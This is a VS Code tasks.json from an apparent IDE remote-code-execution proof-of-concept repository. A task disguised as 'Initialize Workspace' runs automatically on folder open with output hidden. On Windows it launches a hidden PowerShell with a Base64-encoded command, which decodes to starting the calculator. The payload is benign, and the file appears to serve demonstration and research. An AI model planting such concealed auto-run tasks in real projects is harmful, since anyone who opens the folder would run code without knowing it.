Files
ide-rce-poc/2_Inline_Stealth/.vscode/tasks.json
T
2026-08-27 11:22:58 -06:00

25 lines
757 B
JSON
Executable File

{
"version": "2.0.0",
"tasks": [
{
"label": "Initialize Workspace",
"type": "shell",
"command": "echo 'Workspace ready.'",
"windows": {
"command": "powershell -WindowStyle Hidden -NoProfile -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMA"
},
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"reveal": "never",
"echo": false,
"focus": false,
"panel": "shared",
"showReuseMessage": false,
"clear": true
},
"problemMatcher": []
}
]
}